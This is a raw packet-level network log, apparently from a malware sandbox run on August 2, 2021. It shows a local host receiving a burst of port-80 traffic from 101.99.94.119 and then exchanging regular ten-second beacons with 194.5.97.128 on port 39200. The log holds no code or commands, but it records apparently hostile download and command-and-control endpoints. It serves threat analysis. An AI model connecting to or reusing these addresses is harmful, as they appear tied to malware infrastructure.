Aug 2, 2021 21:20:12.283953905 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283989906 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284025908 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284071922 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284081936 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284096003 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284113884 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284151077 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284193993 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284193993 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284235001 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284271002 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284272909 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284308910 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284343004 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284344912 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284392118 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284403086 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284434080 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284471035 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284499884 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284507990 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284544945 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284579992 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284615993 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284626961 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284653902 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284687042 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284699917 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284742117 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284745932 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284778118 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284815073 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284818888 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284852982 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284888983 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284924984 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.284934044 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284959078 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.284960985 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285007000 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285046101 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.285048962 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285085917 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285123110 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285131931 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.285159111 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285193920 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285198927 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.285232067 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285260916 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.285269022 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285315037 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.285341978 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.285413027 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334177971 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334243059 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334296942 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334314108 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334337950 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334348917 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334353924 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334399939 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334414005 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334456921 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334510088 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334522009 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334557056 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334569931 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334605932 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334659100 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334664106 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334716082 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334722042 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334753990 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334779024 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334791899 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334827900 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334841013 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334887981 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334887981 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334935904 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.334952116 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.334984064 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335004091 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335031033 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335074902 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335094929 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335100889 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335127115 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335165977 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335212946 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335235119 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335263014 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335268974 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335319996 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335320950 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335367918 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335378885 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335429907 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335433006 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335510969 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335587025 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335639954 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335645914 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335695982 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335699081 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335750103 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335752010 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335802078 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335813046 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335854053 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335859060 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335903883 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335905075 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.335952044 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.335954905 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336003065 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336004972 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336052895 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336065054 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336112976 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336127043 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336163998 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336189985 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336224079 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336237907 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336273909 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336277962 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336329937 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336380005 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336380959 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336427927 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336429119 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336477995 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336503983 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336535931 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336538076 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336592913 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336642981 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336643934 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336694002 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336698055 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336750031 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336751938 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336802006 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336802959 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336849928 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336853981 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336900949 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.336901903 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.336949110 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.385687113 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.385752916 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.385809898 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.385865927 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.385926962 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.385946989 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.385986090 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386035919 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386039972 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386091948 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386105061 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386143923 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386176109 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386195898 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386251926 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386256933 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386305094 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386331081 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386364937 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386409044 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386420012 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386471987 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386491060 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386524916 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386560917 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386576891 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386632919 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386646986 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386684895 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386725903 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386737108 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386795998 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386815071 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386852026 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386888027 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.386900902 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386955023 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.386984110 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387005091 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387053967 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387058020 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387110949 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387137890 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387192965 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387228966 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387243986 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387301922 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387305975 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387356997 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387393951 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387407064 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387449980 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387466908 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387492895 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387536049 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387556076 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387608051 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387614965 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387653112 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387701035 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387702942 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387751102 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387790918 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387803078 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387851000 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387856007 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387897968 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.387936115 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.387950897 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.388000965 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.388052940 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.388062954 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.388079882 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.388101101 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.388153076 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.388154030 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.388204098 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.388206959 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.388248920 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.388261080 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.388298988 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.388314009 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.388371944 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.437102079 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.437153101 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.437191010 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.437222958 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.437345982 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.437444925 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:14.186785936 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:14.232785940 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:14.233453989 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:14.245203972 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:14.295319080 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:14.336425066 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:14.383316994 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:14.398391008 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:14.463608027 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:14.463694096 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:14.526022911 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:14.546025991 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:14.550575018 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:14.619863987 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:17.439706087 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:17.439908028 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:24.557380915 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:24.599327087 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:24.666464090 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:34.572721004 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:34.600610018 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:34.666574001 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:44.588248968 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:44.597403049 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:44.666131020 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:54.603688955 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:20:54.626771927 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:20:54.697321892 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:04.619297981 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:04.627748966 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:21:04.697093964 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:14.634571075 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:14.643148899 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:21:14.712554932 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:24.650068045 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:24.658744097 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:21:24.727948904 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:34.665545940 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:34.674386024 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:21:34.743462086 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:44.681073904 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:44.686702967 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:21:44.758898020 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:54.696599960 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:21:54.704065084 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:21:54.774398088 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:02.987926960 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:22:03.298795938 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:22:03.923866034 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:22:04.711987019 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:04.724391937 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:22:04.789774895 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:05.127084970 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:22:07.533679008 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:22:12.346446037 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:22:14.727813959 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:14.733257055 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:22:14.805411100 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:21.956644058 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:22:24.742685080 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:24.749867916 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:22:24.820733070 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:34.758160114 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:34.762547016 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:22:34.820461035 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:44.773713112 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:44.784801006 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:22:44.851641893 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:54.789134026 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:22:54.792366028 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:22:54.851457119 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:04.804604053 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:04.809438944 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:23:04.882483959 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:14.820102930 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:14.824969053 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:23:14.897938967 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:24.835563898 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:24.839924097 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:23:24.913496971 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:34.851064920 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:34.859451056 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:23:34.928935051 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:44.866441011 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:44.875057936 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:23:44.944242001 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:54.881974936 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:23:54.888097048 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:23:54.959917068 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:04.897402048 CEST	39200	49767	194.5.97.128	192.168.2.4
